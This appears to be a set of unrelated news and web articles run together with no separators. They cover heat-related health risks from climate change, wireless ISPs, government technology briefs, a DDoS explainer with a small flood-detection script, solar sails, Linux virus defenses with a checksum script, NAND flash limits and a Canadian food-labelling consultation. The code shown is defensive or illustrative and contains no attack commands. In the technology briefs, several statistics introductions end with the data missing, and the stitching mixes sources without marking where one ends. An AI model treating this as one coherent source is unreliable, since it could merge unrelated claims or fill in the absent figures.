Climate change is happening, and with that will come more deaths from heat-related illness and disease, according to a report released Tuesday. The report, spearheaded and funded by investor and philanthropist Thomas Steyer, former Treasury Secretary Hank Paulson, and former New York Mayor Michael Bloomberg, examines many of the effects of climate change for business and individuals. "One of the most striking findings in our analysis is that increasing heat and humidity in some parts of the country could lead to outside conditions that are literally unbearable to humans, who must maintain a skin temperature below 95°F in order to effectively cool down and avoid fatal heat stroke," the report's authors wrote. They use a "Humid Heat Stroke Index" that combines heat and humidity levels to measure how close they come to the point where the body is unable to cool its core temperature. So far the nation has never reached that level, "but if we continue on our current climate path, this will change, with residents in the eastern half of the U.S. experiencing 1 such day a year on average by century’s end and nearly 13 such days per year into the next century." Dr. Al Sommer, the dean emeritus of the Bloomberg School of Public Health at Johns Hopkins University in Baltimore, was on the committee that oversaw the development of the report. He says that often overlooked in the current debate about greenhouse gases and climate change is the effect of global warming on individuals and hospitals. "There will be places that are heavily populated that will see four months in a row with 95 degree and over weather. You won’t be able to let your kids play outside," he told KHN. "The average will be miserable. When your sweat can't evaporate, you have no way to moderate core body temperature, and some people will die. That’s why you had 700 deaths in Chicago in a one week period in 1995. We're going to have a lot of those periods." Sommer joined Lisa Gillespie and other Kaiser Health News reporters and editors in Washington to talk about the climate change report. Here is an edited transcript of his remarks. What will the main health issues be as parts of the country get dangerously hot and humid, and others lose coast line and experience drought? The bottom line is that it's going to get more hot and humid in some areas … you've got the South, the East Coast and Atlantic states, and the problem with hot and humid is that you can’t control body temperature, because when it gets hot, you sweat, and when it evaporates, it cools the skin. But when it hits 95 or 102, and the humidity is such that you can't evaporate sweat, it just stays there, there is no way to cool the body temperature. You can bundle up against the cold, you can wrap up more blankets and you buy some down sleeping bags in freezing weather. But in heat, you can take off more clothes, but you’re still stuck at that heat point index. What are the challenges with getting this message out? The challenge is like every challenge in public health. If we're successful, nothing happens. If you say, "Something is going to happen," [the public's] response will be "You know, who knows? I’m worried about my mortgage," and the average CEO is worried about making quarterly profits, so they don't care. Getting people to be concerned about the future is tough. The person who is wealthy and can afford air conditioning doesn't have much to worry about. You'll have the deniers, and you can't talk to them, and then the people who just don't want to worry about it. 
What challenges will health care systems face? You have to pay attention to something that will dramatically impact the health care system. You have to deal with the poor who live in places that are getting the hottest, and won’t necessarily be able to move up to other places where it’s not so hot. And the health care system is going to have a surge where it’ll have to deal with the problems of excessive heat. But who's going to pay them and who's going to warehouse the 25 percent increase in respirators, pumps, nurses and doctors because 40 years from now something is going to happen? Health care systems would be happy to prepare if someone paid for it. What do you think the health care system can do right now? The health care system as a whole, knowing how much it will cost, can begin to put pressure and engage in climate discussion because [climate change] will end up driving costs. The hospitals have to be prepared, some hospitals may go out of business because there will be places where no one is left alive. Miami? Who’s going to live in Miami? The heat is rising, the water is rising … who’s going to move the [health care] personnel [to another less hot state]? Will North Dakota build bigger hospitals to take up the surge of people who are moving up there? Hospitals need to be able to pick up the slack, and plan for what they will do, and talk to the payers to [be able] to increase their surge capacity. Forty years isn’t far away if you think about a cycle of a hospital. Hopkins just opened two new centers, and it took 25 years. They will have to start now. Are there any benchmarks the health care industry can watch out for to know if there is enough being done to stop or slow climate change so that these health care crisis strategies will not be needed? What would be terrific is if medical CEOs get into a discussion about this. I’m sure they’ve talked about pandemic flu, but I doubt they’ve talked about this. The fact that you can predict the amount of people who will show up in ER with heat stroke, [then] you can start assessing it. You guys and gals who run health care systems know what that will do. What would we really need? That's what this study is about -- to put data on the table at a granular level so people can begin to have informed discussions, which will lead to thoughtful ideas on how you respond and maybe lead to momentum. Kaiser Health News is an editorially independent program of the Henry J. Kaiser Family Foundation, a nonprofit, nonpartisan health policy research and communication organization not affiliated with Kaiser Permanente.
The Internet connection we all rely on is about to change, now that WISP is coming to town. Most people get Internet service from either a telephone company or a cable company because those providers already provide physical connections to their homes and businesses. A WISP (wireless Internet service provider) doesn't need to bring wire to your location, making it a good solution for serving rural areas where telcos and cable companies couldn't be bothered to invest. WISP was unable to match the speed and reliability of DSL and cable modems, however, until recently. As wireless technology has evolved, WISPs are beginning to compete in urban areas on speed and price. Here's how it works. What makes a WISP A WISP is distinct from other wireless services we currently use. Most cell-phone service providers offer wireless Internet service--with 4G LTE being the fastest current technology--but that doesn't make them WISPs. Cell-phone service providers don't expect you to use their service 24/7, and most place very low caps on the amount of data you can transfer over their networks each month (and charge hefty fees if you exceed that amount). Being able to access the Internet while you're out and about is a distinct advantage, but LTE data rates are relatively slow, and coverage can be spotty--especially away from large metropolitan areas. Satellite TV providers that also provide wireless Internet service, such as Dish Network, are closer to being WISPs. They can deliver wireless Internet service to any home that has a clear view of the southern sky. But the data must travel very long distances, which limits the service's speed, and lag can be a big problem--especially for playing games. A true WISP is a mix of cellular provider and satellite provider elements. Like a cell provider, it mounts antennas on towers (or atop buildings) to transmit signals, and it installs an antenna--or in some cases, a dish--on the customer's home or building. Like a satellite service provider, it typically delivers service to a fixed location. Comparing pricing and features Most WISPs offer tiered service levels, charging higher fees for faster speeds and/or more bandwidth. Like telcos, cable companies, and other ISPs, WISPs typically require you to commit to a one- or two-year contract, and they charge an installation or activation fee. Most WISPs are regional operators that serve limited areas. Netlinx, for instance, serves residential and business customers in southern Pennsylvania. The company's prices for residential service range from $30 to $80 per month. At the low end, you get download speeds of up to 1 mbps, with speed bursts of up to 3 mbps. Upload speeds at this tier are 512 kilobits per second. At the high end, you get download speeds of up to 15 mbps (with bursts up to 30 mbps) and upload speeds of 3 mbps. Many WISPs provide faster upload speeds than the typical 5 to 10 mbps that most cable and DSL providers offer. That can be useful for businesses with remote offices, offsite PC or server backup requirements, or other applications where upload speeds are just as important as download speeds. Like other ISPs, some WISPs limit how much data you can use per month, but these limits tend to be more generous than what cell, satellite, and even some cable providers offer. A few, such as Wisper ISP (serving southern Illinois and eastern Missouri), provide uncapped service. 
Utah-based Vivint, a newcomer to the WISP market, is offering wireless Internet service at upload and download speeds of 50 mbps for just $55 per month. But the company--best known for its home-security/automation services--has only just begun to roll out its service, which is not widely available outside Utah.

Finding a WISP

If you think a WISP might be a better option than your current ISP, you can check a number of online directories to find a WISP that provides coverage in your area, including the WISPA Member Directory, WirelessMapping.com, and Broadband Wireless Exchange. Some WISPs provide a coverage map on their website. Others describe only the general coverage area, and you must call or fill out an online form to get coverage details for a particular address.

The time when a WISP was an ISP of last resort--because nothing else was available in a particular area--is coming to an end. As the new class of WISP service spreads, the resulting competition should force telcos and cable companies to step up their game, cut their prices, or both!

This story, "Meet WISP, the Wireless Future of Internet Service" was originally published by PCWorld.
Tricking Cancer Cells University of Michigan scientists created the nanotechnology equivalent of a Trojan horse to smuggle a powerful drug inside tumor cells. The scientists use a man-made molecule called a dendrimer, which is small enough to slip through tiny openings in cell membranes. Dendrimers have a treelike structure with many branches where a variety of other molecules, including cancer-fighting drugs, can be attached. Scientists attached a powerful anti-cancer drug to some of the dendrimer's branches, and fluorescent imaging agents and folic acid to other branches. By taking advantage of cancer cells' appetite for folate, a B vitamin, researchers used the folic acid, the synthetic form of folate, as a "treat" to sneak the cancer drug past the cancer cells' membranes. -- University of Michigan Parts of the UK's Critical National Infrastructure were targeted by an ongoing series of e-mail-borne electronic attacks during late spring. Though the majority of observed attacks have been against the central government, other UK organizations, companies and individuals also appear to be at risk. The attackers seem to be covertly gathering and transmitting of commercially or economically valuable information through Trojan programs delivered either in e-mail attachments or through links to a malicious Web site. The e-mails employ social engineering, including a spoofed sender address and information relevant to recipients' jobs or interests, to entice victims to open the documents. Once installed on a machine, Trojans may be used to obtain passwords, scan networks, steal information and launch further attacks. -- National Infrastructure Security Co-ordination Centre In Coral Gables, Fla., drivers can now use cell phones to pay for parking in all on-street and off-street locations operated by the city. This may be the first of such systems in the United States. Drivers opting to use the new pay-by-cellular-phone program must first activate an account by registering a credit card number, license plate number, cellular phone number and e-mail information. A confidential password is provided to each user. When a car is parked on the street or in a lot that offers the wireless payment option, customers call the posted telephone number on the meter from a mobile phone to log in and start the parking session. When customers leave the parking spot, the number must again be called to log out and end the parking session. Customers choose between two parking payment packages -- 25 cents per parking transaction or $7 a month for unlimited parking transactions. This is in addition to the usual applicable parking fees, which are automatically charged to the user's credit card. -- Coral Gables, Fla. Giving Up GIS Governments must release GIS-enabled maps in electronic form to those requesting them under open records laws in Connecticut, the state Supreme Court ruled unanimously in mid-June. Greenwich, Conn., citizen Stephen Whitaker requested electronic access to the city's GIS maps in December 2001 under the state's open records law. Officials refused to give Whitaker access to the city's GIS system, arguing the records qualified for public safety and trade secret exemptions to the state's public records law. Whitaker sued, and the Connecticut Freedom of Information Commission ruled in his favor in 2002. In 2004, the Connecticut Superior Court agreed. 
Greenwich appealed to the Connecticut Appellate Court, but the Supreme Court stepped in and transferred the case onto its own docket before the intermediate appellate court could rule. -- The Reporters Committee for Freedom of the Press The Intelligent Community Forum (ICF) named Mitaka, Japan, the 2005 Intelligent Community of the Year. The Tokyo suburb has a population of 173,000, and was cited by the ICF for having developed a social and political culture that prizes technology and considers research and development highly important. Mitaka was the first city in Japan to host a field test of fiber-to-the-home networking, served as a test bed for Japan's first ISDN service, and in 1996, Musashin-Mitaka Cable Television became the first ISP in Japan to offer broadband. Among the achievements that led to Mitaka's selection is the founding of the Mitaka Town Management Organization (MTMO). Since its creation, the MTMO's seven facilities have become home to 100 technology businesses. The MTMO also provides business-matching programs and venture investment, as well as other financial services, to encourage business startup and growth. -- Intelligent Community Forum Nearly 100 percent of public libraries offer technology services, according to a report by Florida State University. On the other hand, libraries struggle to upgrade technology regularly, maintain quality Internet connections, provide training and create enough workstations to meet demand, according to the report sponsored by the American Library Association and the Bill & Melinda Gates Foundation. Wi-Fi hotspots can now be found in 100 countries around the world, according to recent data released by JiWire. The United States tops JiWire's list of Wi-Fi friendly countries for having the greatest number of hotspot locations, followed by the United Kingdom, Germany and France. In 2004, Counterpane monitored 523 billion network events worldwide, and the company's analysts investigated 648,000 security "tickets." The company reports that of all hostile security events: A new survey found that 82 percent of broadband users are interested in receiving "triple play" services -- voice, video and high-speed data -- from a single provider. --InsightExpress on behalf of SupportSoft. People considering online education don't see much difference between learning online versus in person, and some educators agree, according to a study of U.S. online education site visitors by Feedback Research. Site visitors said the following attributes of online schools are no different than traditional schools (shown here as a percentage of respondents). The nation's leading e-government Web sites based on customer satisfaction, according to the latest survey by the American Satisfaction Index and Foresee Results, are ranked as follows:
Jan. 22 — Scientists around the globe are using Cornell CatchAll software to perform more accurate statistical analyses in fields ranging from microbial ecology to viral metagenomics. Developed by Computer and Information Science professor John Bunge and Cornell Center for Advanced Computing database designers, CatchAll has become the standard package for population diversity analysis. In the January 2014 publication of Microbial Ecology, scientists report using CatchAll in the analysis of soil contaminated with heavy metals, a pervasive problem in the vicinity of mines and industrial facilities in Southern Poland. Little is known about most bacterial species thriving in such soils and even less about a core bacterial community. Marcin Golebiewski and colleagues at Nicolaus Copernicus University used 16S rDNA pyrosequencing and CatchAll to assess the influence of heavy metals on both bacterial diversity and community structure. It was found that Zinc had the biggest impact in decreasing both diversity and species richness. Understanding biodiversity in polluted areas helps scientists to quantify the detrimental effects of human activity on particular taxonomic groups and to monitor bioremediation efforts. In another recent study published in Clinical and Vaccine Immunology, Patricia Diaz and colleagues at The University of Connecticut conducted the first comprehensive evaluation of long-term organ transplant immunosuppression on the oral bacterial microbiome. Many organ transplant patients require lifelong immunosuppression in order to prevent transplant rejection. This study found that prednisone had the most significant effect on bacterial diversity and on the colonization of potentially opportunistic pathogens. The researchers used Catchall to calculate the number of observed operational taxonomic units (OTU) and number of estimated OTUs in order to determine species richness. The latest version of CatchAll was updated in October 2013 and is available for download. In spring 2014 John Bunge, with Cornell Department of Statistical Sciences Ph.D. student Amy Willis, will release a new software package called breakaway. Written in R, breakaway implements a radical new statistical approach to diversity estimation based on a little-known thread in probability distribution theory, which exploits ratios of sample counts. A beta version of breakaway is currently available for testing by contacting the authors. Source: Cornell University Center for Advanced Computing
NASA, Cisco develop new environmental monitor - By Patrick Marshall - Mar 09, 2009 NASA and Cisco Systems have announced they are jointly developing a new global environmental monitoring system, named Planetary Skin. They intend the system to be an online, collaborative application that will publish in near real time environmental data collected from satellites and airborne, sea-based and land-based sensors. The site — which will be available to government agencies, private companies and the public — will also include tools for analyzing and reporting the data. The first steps in developing Planetary Skin will be a series of pilot projects. One of the first projects will be Rainforest Skin, which will focus on the deforestation of rain forests. Developers will explore methods for building a sensor network to gather appropriate data. The team launched a Web site — www.planetaryskin.org — March 3 that will provide additional details about Planetary Skin and the pilot projects' progress. Patrick Marshall is a freelance technology writer for GCN.
What is a DDoS attack and how do you protect against DDoS attacks?

What is a DDoS attack?

A DDoS (Distributed Denial of Service) attack is an attempt to exhaust the resources available to a network, application or service so that genuine users cannot gain access. Beginning in 2010, and driven in no small part by the rise of hacktivism, we've seen a renaissance in DDoS attacks that has led to innovation in the areas of tools, targets and techniques. Today, DDoS has evolved into a series of attacks that include very high volume floods along with more subtle and difficult-to-detect attacks that target applications as well as existing security infrastructure such as firewalls and IPS.

What are the different types of DDoS attacks?

DDoS attacks vary significantly, and there are thousands of different ways an attack can be carried out (attack vectors), but an attack vector will generally fall into one of three broad categories:

- Volumetric attacks: Attempt to consume the bandwidth either within the target network/service, or between the target network/service and the rest of the Internet. These attacks are simply about causing congestion.
- TCP state-exhaustion attacks: These attacks attempt to consume the connection state tables which are present in many infrastructure components such as load balancers, firewalls and the application servers themselves. Even high-capacity devices capable of maintaining state on millions of connections can be taken down by these attacks.
- Application-layer attacks: These target some aspect of an application or service at Layer 7. These are the most deadly kind of attacks, as they can be very effective with as few as one attacking machine generating a low traffic rate (which makes them very difficult to proactively detect and mitigate). These attacks have become prevalent over the past three or four years, and simple application-layer flood attacks (HTTP GET floods and so on) have been among the most common DDoS attacks seen in the wild.

Today's sophisticated attackers are blending volumetric, state-exhaustion and application-layer attacks against infrastructure devices, all in a single, sustained attack. These attacks are popular because they are difficult to defend against and often highly effective.

The problem doesn't end there. According to Frost & Sullivan, DDoS attacks are "increasingly being utilized as a diversionary tactic for targeted persistent attacks." Attackers are launching DDoS attacks to distract the network and security teams while simultaneously trying to inject malware into the network with the goal of stealing IP and/or critical customer or financial information.

Why are DDoS attacks so dangerous?

DDoS represents a significant threat to business continuity. As organizations have grown more dependent on the Internet and web-based applications and services, availability has become as essential as electricity. DDoS is not only a threat to retailers, financial services and gaming companies with an obvious need for availability. DDoS attacks also target the mission-critical business applications that your organization relies on to manage daily operations, such as email, salesforce automation, CRM and many others. Additionally, other industries, such as manufacturing, pharma and healthcare, have internal web properties that the supply chain and other business partners rely on for daily business operations. All of these are targets for today's sophisticated attackers.

What are the consequences of a successful DDoS attack?

When a public-facing website or application is unavailable, that can lead to angry customers, lost revenue and brand damage. When business-critical applications become unavailable, operations and productivity grind to a halt. When internal websites that partners rely on become unavailable, supply chains and production are disrupted. A successful DDoS attack also means that your organization has invited more attacks. You can expect attacks to continue until more robust defenses are deployed.

What are your DDoS protection options?

Given the high-profile nature of DDoS attacks, and their potentially devastating consequences, many security vendors have suddenly started offering DDoS protection solutions. With so much riding on your decision, it is critical to understand the strengths, and weaknesses, of your options.

Existing Infrastructure Solutions (Firewalls, Intrusion Detection/Prevention Systems, Application Delivery Controllers / Load Balancers)

IPS devices, firewalls and other security products are essential elements of a layered-defense strategy, but they are designed to solve security problems that are fundamentally different from dedicated DDoS detection and mitigation products. IPS devices, for example, block break-in attempts that cause data theft. Meanwhile, a firewall acts as a policy enforcer to prevent unauthorized access to data. While such security products effectively address "network integrity and confidentiality," they fail to address a fundamental concern regarding DDoS attacks: "network availability." What's more, IPS devices and firewalls are stateful, inline solutions, which means they are vulnerable to DDoS attacks and often become targets themselves. Similar to IDS/IPS devices and firewalls, ADCs and load balancers have no broader network traffic visibility or integrated threat intelligence, and they are also stateful devices vulnerable to state-exhausting attacks. The increase in state-exhausting volumetric threats and blended application-level attacks makes ADCs and load balancers a limited and partial solution for customers requiring best-of-breed DDoS protection.

Content Delivery Networks (CDN)

The truth is a CDN can address the symptoms of a DDoS attack by simply absorbing these large volumes of data. It lets all the information in and through; all are welcome. There are three caveats here. The first is that there must be bandwidth available to absorb this high-volume traffic; some of these volumetric attacks exceed 300 Gbps, and there is a price for all of that capacity. Second, there are ways around the CDN; not every webpage or asset will utilize it. Third, a CDN cannot protect against an application-layer attack. So let the CDN do what it was intended to do.

What is Arbor's approach to DDoS protection?

Arbor has been protecting the world's largest and most demanding networks from DDoS attacks for more than a decade. Arbor strongly believes that the best way to protect your resources from modern DDoS attacks is through a multi-layer deployment of purpose-built DDoS mitigation solutions. You need protection in the cloud to stop today's high-volume attacks, which are exceeding 300 Gbps. You also need on-premise protection against stealthy application-layer attacks, and against attacks on existing stateful infrastructure devices such as firewalls, IPS and ADCs. Only with a tightly integrated, multi-layer defense can you adequately protect your organization from the full spectrum of DDoS attacks.
- Arbor Networks Cloud (Tightly integrated, multi-layer DDoS protection) - Arbor Networks APS (On-Premises) - Arbor Networks SP/TMS (High Capacity On-Premise Solution for Large Organizations) Arbor customers enjoy a considerable competitive advantage by giving them both a micro view of their own network, via our products, combined with a macro view of global Internet traffic, via our ATLAS threat intelligence infrastructure. This is a powerful combination of network security intelligence that is unrivaled today. From this unique vantage point, Arbor’s security research team is ideally positioned to deliver intelligence about DDoS, malware and botnets that threaten Internet infrastructure and network availability.
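Application-layer floods are hard to spot precisely because each attacking client can resemble a slow, legitimate user. The sketch below illustrates one simple detection idea, counting requests per client IP over a sliding window and flagging outliers; the window length, threshold and addresses are invented for the example, and this is not a description of how Arbor's products work.

```python
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 10           # length of the sliding window (assumed value)
MAX_REQUESTS_PER_WINDOW = 50  # per-client threshold (assumed value)

class FloodDetector:
    """Flags client IPs whose request rate exceeds a simple per-window threshold."""

    def __init__(self):
        self.requests = defaultdict(deque)  # ip -> timestamps of recent requests

    def record(self, ip, now=None):
        now = time.time() if now is None else now
        window = self.requests[ip]
        window.append(now)
        # Drop timestamps that have fallen out of the sliding window.
        while window and now - window[0] > WINDOW_SECONDS:
            window.popleft()
        return len(window) > MAX_REQUESTS_PER_WINDOW

detector = FloodDetector()

# Example: a burst of 60 requests in six seconds from one address trips the detector.
for i in range(60):
    suspicious = detector.record("198.51.100.7", now=1000.0 + i * 0.1)
print("flagged" if suspicious else "ok")
```

Real mitigation systems combine many such signals with upstream traffic data, which is why the article stresses multi-layer, purpose-built defenses rather than any single heuristic.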
Space junk problem: Is a solar-sail ship the answer?

- By Kevin McCaney - Sep 26, 2011

A big reason NASA couldn't predict exactly when and where its Upper Atmospheric Research Satellite (UARS) would fall to Earth last week was the effect solar activity had on its trajectory. Heat from the sun can cause the upper levels of the Earth's atmosphere, the thermosphere, to warm and "puff up," which creates a drag on satellites, NASA says on its website. And because the effects aren't consistent, scientists could only estimate the six-ton satellite's re-entry.

UARS, a 20-year-old climate research satellite that had been out of commission for six years, finally came down, though the time and location are still uncertain. NASA estimates it hit between 11:23 p.m. EDT Sept. 23 and 1:09 a.m. Sept. 24 somewhere in the Pacific Ocean. The trail of debris that didn't burn up in the atmosphere was probably spread over 500 miles.

But if solar activity can produce unpredictable results, it also can be harnessed, and NASA is planning to test one method that could, among other things, be used to clear orbital paths of the kind of space junk that UARS had become. The agency recently announced plans to test a large solar sail as part of an upcoming round of Technology Demonstration Missions aimed at improving space communications, deep space navigation and in-space propulsion capabilities.

Solar sails aren't new, but this one will be seven times the size of any previously flown, which NASA says will increase its utility for jobs such as deep-space exploration, advanced geostorm warnings and removal of orbital debris. The sail, expected to be deployed in 2015 or 2016, is being developed by LeGarde Inc., in collaboration with NASA and the National Oceanic and Atmospheric Administration. Using the sun to provide thrust, the spacecraft would be able to navigate orbital paths and collect debris over a period of years. Future satellites also could have sails built in so that, when they've completed their missions, they can be taken out of orbit in an orderly way rather than becoming space junk themselves or falling to Earth and causing "Deep Impact" consternation.

NASA says the sail also would allow solar-storm satellites to be positioned farther from Earth than current such satellites, which would increase warning times of solar storms from 15 minutes to 45 minutes, and the sails could provide propulsion for deep-space probes.

Orbital debris, better known by the catchier name of space junk, is a growing problem in the upper atmosphere. The U.S. Space Surveillance Network tracks about 8,000 working and decommissioned satellites and other objects larger than 4 inches, and there are millions of other bits and pieces floating around. The biggest problem isn't that the debris will eventually fall to Earth, since the vast majority of junk would burn up. But with that much congestion, active satellites and spacecraft could collide with other objects. In 2009, a defunct Russian spacecraft crashed into a working Iridium satellite, taking the satellite out of commission and creating more space junk.

NASA, the military and other organizations have considered ways of getting rid of the debris, including using laser guns to slow down orbiting junk so that it would re-enter the atmosphere and burn up. But a solar-powered space schooner that collects bits as it sails by might be an even more efficient way of cleaning up the litter.
Kevin McCaney is a former editor of Defense Systems and GCN.
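For a feel of the physics involved, the short Python sketch below estimates the thrust and yearly delta-v a reflective sail picks up from sunlight near Earth. The sail area and spacecraft mass are assumed, illustrative numbers rather than this mission's actual figures, and the model ignores gravity, shadowing, and the changing distance from the sun.

    # Order-of-magnitude solar-sail thrust estimate; sail area and craft mass
    # are illustrative assumptions, not the mission's published figures.
    SOLAR_CONSTANT_W_M2 = 1361.0      # sunlight intensity near Earth
    SPEED_OF_LIGHT_M_S = 3.0e8

    sail_area_m2 = 1200.0             # assumed area of a large demonstration sail
    craft_mass_kg = 50.0              # assumed total spacecraft mass

    # Radiation pressure on a perfectly reflective sail is 2 * intensity / c.
    pressure_pa = 2.0 * SOLAR_CONSTANT_W_M2 / SPEED_OF_LIGHT_M_S
    thrust_n = pressure_pa * sail_area_m2
    accel_m_s2 = thrust_n / craft_mass_kg

    print(f"radiation pressure:     {pressure_pa * 1e6:.2f} micropascals")
    print(f"thrust on the sail:     {thrust_n * 1000:.1f} millinewtons")
    print(f"acceleration:           {accel_m_s2 * 1000:.3f} mm/s^2")
    print(f"delta-v after one year: {accel_m_s2 * 3.15e7:.0f} m/s")

Even a thrust of a few millinewtons, applied continuously for a year, adds up to kilometers per second of velocity change, which is why a sail can plausibly shepherd debris over long periods.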
Linux Viruses: Overview Viruses are, by definition, malicious pieces of code that replicate themselves. They can do this through a variety of methods, including "infecting" other executable files or spreading macros and other forms of executable content (e.g. JPEGs). Viruses are most commonly spread by users sharing files, which is especially easy with email, and with such a wide variety of content being available on Web and FTP servers. Most viruses do not really gain the author anything - they simply damage data and computer systems. Very few do anything, like stealing passwords or implementing backdoors (although this is changing, especially with distributed denial of service tools becoming very popular). Currently, the most common viruses are mostly macro viruses for Microsoft Office products like Word, Excel, and Access, for a number of reasons: Poor security controls on macros (you can turn them off, but many macro viruses re-enable macro support when run). File types such as DOC and XLS are commonly emailed around between people, so it isn't too suspicious to receive them via email. Almost all Windows computers have MS Office installed. It is remarkably easy to write these macro viruses, and even easier to modify them. There are other infection vectors for Linux. As with Windows, many users download third-party applications and install them (usually as root). It is trivial to create what looks like a legitimate program ("DVD ripper and VCD encoder for Linux version 2.34"). Many users will install it, and when it fails to work as expected, they may uninstall it or forget about it. Meanwhile, the virus payload has been delivered. Even legitimate programs can be subverted, and even though the most popular packaging format (RPM) supports digital signatures, very few users bother to check them. Software on popular sites has been Trojaned in past, and even though the PGP signature attached was completely bogus, it's usually downloaded by more than a few people before anyone actually checks it and alerts the site. There is some good news (not a whole lot though). If a user runs a program as a normal user account, chances are it cannot write to system binaries. This significantly decreases the effectiveness of viruses delivered via email or other data sources, since they can only modify a user's files and not infect the system. The reason this is so effective in Windows is that default file permissions in NT are "everybody - full control" (and many sites do not tighten this), and of course Windows 9x has no file permissions. The flip side of this is that most Linux machines have at least one (or many) local root exploits. Examples include Perl, mail, Sendmail, the Linux kernel itself, and much more. Unless an administrator keeps the machines up-to-date, a sophisticated virus could exploit a weakness and modify system files, or install Trojans and backdoors. Unfortunately, most machines are not kept up-to-date very well, and even if they are, there is a window of opportunity between vulnerabilities being reported and vendor upgrades being issued (although Linux has some of the lowest averages, in some cases ,<24 hours). This makes writing an effective virus for Linux harder than - but not much harder than - writing any old virus for Linux. The best defenses against Linux viruses are as follows: If possible, check the GnuPG or PGP signature on the RPM file, or the detached signature for tarballs and dpkg. You must get the GnuPG/PGP securely. Using a public keyserver is not terribly secure. 
Copying them off of a vendor's CD-ROM (such as SuSE's) is an example of how to do it securely. Use "rpm --checksig" to verify RPM packages. To verify MD5 checksums, "md5sum" is used; the checksums must be obtained from a trusted source such as a secure Web page. Download software from official sites or official mirror sites. While it's nice that people mirror software and make it available, there is an issue of trust, and since most people do not check package signatures, it is too easy for attackers to set up a site and merrily let people download software. Make regular backups, preferably several copies, and store them on write-protected media. Acquire an antivirus scanner and use it properly (more on this in the next article).
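As a minimal sketch of the checksum step, the Python below streams a downloaded file through MD5 and compares the digest against one published on a trusted page; the file name and expected digest are placeholders. It complements, rather than replaces, checking the GnuPG/PGP signature (for example with "rpm --checksig package.rpm" or "gpg --verify file.sig file").

    import hashlib
    import sys

    def md5_of(path, chunk_size=1 << 20):
        """Compute the MD5 hex digest of a file in streaming fashion."""
        digest = hashlib.md5()
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(chunk_size), b""):
                digest.update(chunk)
        return digest.hexdigest()

    def verify_download(path, expected_md5):
        """Compare a file's MD5 against a digest obtained from a trusted source."""
        actual = md5_of(path)
        if actual != expected_md5.lower():
            print(f"MISMATCH: {path}: got {actual}, expected {expected_md5}")
            return False
        print(f"OK: {path} matches the published MD5")
        return True

    if __name__ == "__main__":
        # Usage: python verify.py package.tar.gz <md5-from-a-trusted-page>
        ok = verify_download(sys.argv[1], sys.argv[2])
        sys.exit(0 if ok else 1)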
A Computerworld article last week reported on a researcher's prediction that shrinking the size of NAND flash memory for solid-state drives (SSDs) may cause the technology to lose significance altogether. In a lecture delivered at this week's Usenix Conference on File and Storage Technologies, Laura Grupp, a graduate student at the University of California, San Diego, argued that as flash memory is manufactured at smaller geometries, data errors and latency would increase. The idea behind shrinking the transistors is to boost capacity, which translates into lower cost per gigabyte. But that pushes performance and reliability in the opposite direction. Grupp wrote about the phenomenon in a study titled The Bleak Future of NAND Flash Memory. "While the growing capacity of SSDs and high IOP rates will make them attractive for many applications, the reduction in performance that is necessary to increase capacity while keeping costs in check may make it difficult for SSDs to scale as a viable technology for some applications," she wrote. Grupp, along with John Davis of Microsoft Research and Steven Swanson of UCSD's Non-Volatile Systems Lab, tested 45 types of NAND flash chips, spread across six vendors and multiple transistor geometries (between 25nm and 72nm). The researchers found that write speed for flash blocks had high variations in latency. In addition, they also discovered wide variations in error rates as the NAND flash wore out. Multi-level cell (MLC), and especially triple-level cell (TLC), NAND produced the worst results, while single-level cell (SLC) performed the best. Grupp, Swanson and Davis extrapolated the results to 6.5nm technology, which is the size NAND transistors are expected to be in 2024. At that size, the researchers estimate that read/write latency will double in multi-level flash, with triple-level suffering 2.5 times as much latency. Bit error rates are expected to increase as well, more than tripling those of current levels. But since flash memory is a solid-state technology (versus the mechanical technology used in hard disks), SSDs will always have a natural advantage in speed and throughput. In general, reading and writing to an SSD is about 100 times faster than a hard drive. Grupp concedes that even with 2024-level transistor sizes, SSDs will outperform their hard disk competition by a wide margin, 32,000 IOPS to 200 IOPS, respectively. But because of the latency and error rate issues, she believes that 6.5nm will be the end of the line for flash memory. For flash memory, there seems to be a choice of performance or capacity, but not both. This could have lasting impacts on data-intensive applications that lean heavily on IOPS performance. Without a replacement for NAND memory, performance could stall or even decline until another solid-state technology takes its place.
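To make the projections concrete, the small sketch below applies the multipliers quoted above (latency roughly doubling for MLC, 2.5x for TLC, error rates more than tripling) to assumed present-day baseline figures. The baselines are placeholders chosen for illustration, not numbers taken from the study.

    # Rough illustration of the article's projections; baseline numbers are
    # placeholders, not measured values from the study.
    ssd_iops_2024, hdd_iops_2024 = 32_000, 200        # figures quoted in the article

    baseline = {                                       # assumed present-day baselines
        "mlc_write_latency_us": 1_300,                 # hypothetical MLC program latency
        "tlc_write_latency_us": 2_600,                 # hypothetical TLC program latency
        "bit_error_rate": 1e-7,                        # hypothetical raw bit error rate
    }

    projected = {
        "mlc_write_latency_us": baseline["mlc_write_latency_us"] * 2.0,   # "double"
        "tlc_write_latency_us": baseline["tlc_write_latency_us"] * 2.5,   # "2.5 times"
        "bit_error_rate": baseline["bit_error_rate"] * 3.0,               # "more than tripling"
    }

    print(f"SSD vs HDD IOPS advantage in 2024: {ssd_iops_2024 / hdd_iops_2024:.0f}x")
    for key, value in projected.items():
        print(f"projected {key}: {value:g} (from {baseline[key]:g})")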
OTTAWA, ONTARIO--(Marketwired - Jan. 28, 2014) - Health Canada - The Honorable Rona Ambrose, Minister of Health, and Eve Adams, Parliamentary Secretary to the Minister of Health, today launched a Canada-wide consultation on ways to improve nutrition information on food labels by hosting a round table discussion with parents and consumers at the Parent Resource Centre in Ottawa. The consultation will focus on parents and consumers, and will include round table discussions in several Canadian cities, and an opportunity to participate online. The consultations provide a way for the Government of Canada to listen to Canadians, and to better understand how parents use nutrition information on food labels to make nutritious choices for their families.
- Nutrition labelling became fully mandatory on prepackaged foods in Canada on December 12, 2007. This means that food companies have to include nutrition labelling on prepackaged foods.
- Food labels provide information about the nutritional value of foods through the Nutrition Facts table, the list of ingredients, and health and nutrition claims found on packaging.
- Canada is a world leader in the field of nutrition labelling and was one of the first countries to require mandatory nutrition labelling on pre-packaged foods.
"As stated in the Speech from the Throne, our Government will consult with Canadian parents to improve the way information is presented on food labels. These consultations give our Government an opportunity to hear from parents about how to help families better understand and use food labels to make healthier food choices." (Minister of Health)
"The feedback we received today is just the beginning. We heard from parents about how important it is to have the tools they need to make healthy food choices." (Parliamentary Secretary to the Minister of Health)
"Proper food labelling is essential to make it easier for parents to make the healthiest choices in order to keep their children healthy." (Executive Director, Parent Resource Centre)
